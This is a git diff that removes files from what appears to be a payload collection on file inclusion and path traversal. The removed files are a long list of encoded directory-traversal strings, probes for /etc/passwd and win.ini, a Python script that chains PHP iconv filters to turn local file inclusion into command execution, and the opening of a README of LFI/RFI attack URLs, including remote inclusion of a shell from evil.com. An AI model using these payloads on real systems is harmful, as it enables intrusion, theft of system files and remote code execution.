-/..0x2f -/..0x2f..0x2f -/..0x2f..0x2f..0x2f -/..0x2f..0x2f..0x2f..0x2f -/..0x2f..0x2f..0x2f..0x2f..0x2f -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f -/..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f -/0x2e0x2e/ -/0x2e0x2e/0x2e0x2e/ -/0x2e0x2e/0x2e0x2e/0x2e0x2e/ -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/ -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/ -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/ -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/ -/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/ -/0x2e0x2e0x2f -/0x2e0x2e0x2f0x2e0x2e0x2f -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f -/0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f -/..0x5c -/..0x5c..0x5c -/..0x5c..0x5c..0x5c -/..0x5c..0x5c..0x5c..0x5c -/..0x5c..0x5c..0x5c..0x5c..0x5c -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c -/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c -/0x2e0x2e\ -/0x2e0x2e\0x2e0x2e\ -/0x2e0x2e\0x2e0x2e\0x2e0x2e\ -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\ -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\ -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\ -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\ -/0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\ -/0x2e0x2e0x5c -/0x2e0x2e0x5c0x2e0x2e0x5c -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c -/0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c -/..%c0%2f -/..%c0%2f..%c0%2f -/..%c0%2f..%c0%2f..%c0%2f -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f -/..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f -/%c0%2e%c0%2e/ -/%c0%2e%c0%2e/%c0%2e%c0%2e/ -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/ -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/ -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/ -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/ -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/ -/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/ -/%c0%2e%c0%2e%c0%2f -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f -/%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f -/..%c0%5c -/..%c0%5c..%c0%5c -/..%c0%5c..%c0%5c..%c0%5c -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c -/..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c -/%c0%2e%c0%2e\ -/%c0%2e%c0%2e\%c0%2e%c0%2e\ -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\ -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\ -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\ -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\ -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\ -/%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\ -/%c0%2e%c0%2e%c0%5c -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c -/%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c -////%2e%2e%2f -////%2e%2e%2f%2e%2e%2f -////%2e%2e%2f%2e%2e%2f%2e%2e%2f -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -////%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f -/\\\%2e%2e%5c -/\\\%2e%2e%5c%2e%2e%5c -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c -/..// -/..//..// -/..//..//..// -/..//..//..//..// -/..//..//..//..//..// -/..//..//..//..//..//..// -/..//..//..//..//..//..//..// -/..//..//..//..//..//..//..//..// -/../// -/..///../// -/..///..///../// -/..///..///..///../// -/..///..///..///..///../// -/..///..///..///..///..///../// -/..///..///..///..///..///..///../// -/..///..///..///..///..///..///..///../// -/..\\ -/..\\..\\ -/..\\..\\..\\ -/..\\..\\..\\..\\ -/..\\..\\..\\..\\..\\ -/..\\..\\..\\..\\..\\..\\ -/..\\..\\..\\..\\..\\..\\..\\ -/..\\..\\..\\..\\..\\..\\..\\..\\ -/..\\\ -/..\\\..\\\ -/..\\\..\\\..\\\ -/..\\\..\\\..\\\..\\\ -/..\\\..\\\..\\\..\\\..\\\ -/..\\\..\\\..\\\..\\\..\\\..\\\ -/..\\\..\\\..\\\..\\\..\\\..\\\..\\\ -/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\ -/./\/./ -/./\/././\/./ -/./\/././\/././\/./ -/./\/././\/././\/././\/./ -/./\/././\/././\/././\/././\/./ -/./\/././\/././\/././\/././\/././\/./ -/./\/././\/././\/././\/././\/././\/././\/./ -/./\/././\/././\/././\/././\/././\/././\/././\/./ -/.\/\.\ -/.\/\.\.\/\.\ -/.\/\.\.\/\.\.\/\.\ -/.\/\.\.\/\.\.\/\.\.\/\.\ -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\ -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\ -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\ -/.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../ -/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\ -/.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\ -/./../ -/./.././../ -/./.././.././../ -/./.././.././.././../ -/./.././.././.././.././../ -/./.././.././.././.././.././../ -/./.././.././.././.././.././.././../ -/./.././.././.././.././.././.././.././../ -/.\..\ -/.\..\.\..\ -/.\..\.\..\.\..\ -/.\..\.\..\.\..\.\..\ -/.\..\.\..\.\..\.\..\.\..\ -/.\..\.\..\.\..\.\..\.\..\.\..\ -/.\..\.\..\.\..\.\..\.\..\.\..\.\..\ -/.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\ -/.//..// -/.//..//.//..// -/.//..//.//..//.//..// -/.//..//.//..//.//..//.//..// -/.//..//.//..//.//..//.//..//.//..// -/.//..//.//..//.//..//.//..//.//..//.//..// -/.//..//.//..//.//..//.//..//.//..//.//..//.//..// -/.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..// -/.\\..\\ -/.\\..\\.\\..\\ -/.\\..\\.\\..\\.\\..\\ -/.\\..\\.\\..\\.\\..\\.\\..\\ -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\ -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\ -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\ -/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\ -/../ -/../..// -/../..//../ -/../..//../..// -/../..//../..//../ -/../..//../..//../..// -/../..//../..//../..//../ -/../..//../..//../..//../..// -/..\ -/..\..\\ -/..\..\\..\ -/..\..\\..\..\\ -/..\..\\..\..\\..\ -/..\..\\..\..\\..\..\\ -/..\..\\..\..\\..\..\\..\ -/..\..\\..\..\\..\..\\..\..\\ -/../// -/../../// -/../..//../// -/../..//../../// -/../..//../..//../// -/../..//../..//../../// -/../..//../..//../..//../// -/../..//../..//../..//../../// -/..\\\ -/..\..\\\ -/..\..\\..\\\ -/..\..\\..\..\\\ -/..\..\\..\..\\..\\\ -/..\..\\..\..\\..\..\\\ -/..\..\\..\..\\..\..\\..\\\ -/..\..\\..\..\\..\..\\..\..\\\ \ No newline at end of file diff --git a/File Inclusion/Intruders/simple-check.txt b/File Inclusion/Intruders/simple-check.txt deleted file mode 100644 index debf0e7..0000000 --- a/File Inclusion/Intruders/simple-check.txt +++ /dev/null @@ -1,10 +0,0 @@ -etc/passwd -etc/passwd%00 -etc%2fpasswd -etc%2fpasswd%00 -etc%5cpasswd -etc%5cpasswd%00 -etc%c0%afpasswd -etc%c0%afpasswd%00 -C:\boot.ini -C:\WINDOWS\win.ini \ No newline at end of file diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/LFI2RCE.py deleted file mode 100644 index 3943715..0000000 --- a/File Inclusion/LFI2RCE.py +++ /dev/null @@ -1,60 +0,0 @@ -import requests - -url = "http://localhost:8000/chall.php" -file_to_use = "/etc/passwd" -command = "id" - -# -base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" - -conversions = { - 'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', - 'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', - 'C': 'convert.iconv.UTF8.CSISO2022KR', - '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', - '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', - 'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213', - 's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', - 'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS', - 'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', - 'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213', - 'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', - '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', - 'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', - 'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2', - 'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', - 'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', - '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', - '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2' -} - - -# generate some garbage base64 -filters = "convert.iconv.UTF8.CSISO2022KR|" -filters += "convert.base64-encode|" -# make sure to get rid of any equal signs in both the string we just generated and the rest of the file -filters += "convert.iconv.UTF8.UTF7|" - - -for c in base64_payload[::-1]: - filters += conversions[c] + "|" - # decode and reencode to get rid of everything that isn't valid base64 - filters += "convert.base64-decode|" - filters += "convert.base64-encode|" - # get rid of equal signs - filters += "convert.iconv.UTF8.UTF7|" - -filters += "convert.base64-decode" - -final_payload = f"php://filter/{filters}/resource={file_to_use}" - -with open('payload', 'w') as f: - f.write(final_payload) - -r = requests.get(url, params={ - "0": command, - "action": "include", - "file": final_payload -}) - -print(r.text) \ No newline at end of file diff --git a/File Inclusion/README.md b/File Inclusion/README.md deleted file mode 100644 index 70676a2..0000000 --- a/File Inclusion/README.md +++ /dev/null @@ -1,486 +0,0 @@ -# File Inclusion - -> The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. - -> The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application - -## Summary - -- [File Inclusion](#file-inclusion) - - [Summary](#summary) - - [Tools](#tools) - - [Basic LFI](#basic-lfi) - - [Null byte](#null-byte) - - [Double encoding](#double-encoding) - - [UTF-8 encoding](#utf-8-encoding) - - [Path and dot truncation](#path-and-dot-truncation) - - [Filter bypass tricks](#filter-bypass-tricks) - - [Basic RFI](#basic-rfi) - - [Null byte](#null-byte-1) - - [Double encoding](#double-encoding-1) - - [Bypass allow_url_include](#bypass-allow_url_include) - - [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) - - [Wrapper php://filter](#wrapper-phpfilter) - - [Wrapper zip://](#wrapper-zip) - - [Wrapper data://](#wrapper-data) - - [Wrapper expect://](#wrapper-expect) - - [Wrapper input://](#wrapper-input) - - [Wrapper phar://](#wrapper-phar) - - [LFI to RCE via /proc/*/fd](#lfi-to-rce-via-procfd) - - [LFI to RCE via /proc/self/environ](#lfi-to-rce-via-procselfenviron) - - [LFI to RCE via upload](#lfi-to-rce-via-upload) - - [LFI to RCE via upload (race)](#lfi-to-rce-via-upload-race) - - [LFI to RCE via upload (FindFirstFile)](#lfi-to-rce-via-upload-findfirstfile) - - [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) - - [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) - - [RCE via SSH](#rce-via-ssh) - - [RCE via Mail](#rce-via-mail) - - [RCE via Apache logs](#rce-via-apache-logs) - - [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) - - [LFI to RCE via credentials files](#lfi-to-rce-via-credentials-files) - - [Windows version](#windows-version) - - [Linux version](#linux-version) - - [References](#references) - -## Tools - -* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) -* [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) -* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) -* [panoptic - https://github.com/lightos/Panoptic](https://github.com/lightos/Panoptic) - -## Basic LFI - -In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. - -```powershell -http://example.com/index.php?page=../../../etc/passwd -``` - -### Null byte - -:warning: In versions of PHP below 5.3.4 we can terminate with null byte. - -```powershell -http://example.com/index.php?page=../../../etc/passwd%00 -``` - -### Double encoding - -```powershell -http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd -http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 -``` - -### UTF-8 encoding - -```powershell -http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 -``` - -### Path and dot truncation - -On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. - -```powershell -http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] -http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] -http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] -http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd -``` - -### Filter bypass tricks - -```powershell -http://example.com/index.php?page=....//....//etc/passwd -http://example.com/index.php?page=..///////..////..//////etc/passwd -http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd -``` - -## Basic RFI - -Most of the filter bypasses from LFI section can be reused for RFI. - -```powershell -http://example.com/index.php?page=http://evil.com/shell.txt -``` - -### Null byte - -```powershell -http://example.com/index.php?page=http://evil.com/shell.txt%00 -``` - -### Double encoding - -```powershell -http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt -``` - -### Bypass allow_url_include - -When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. 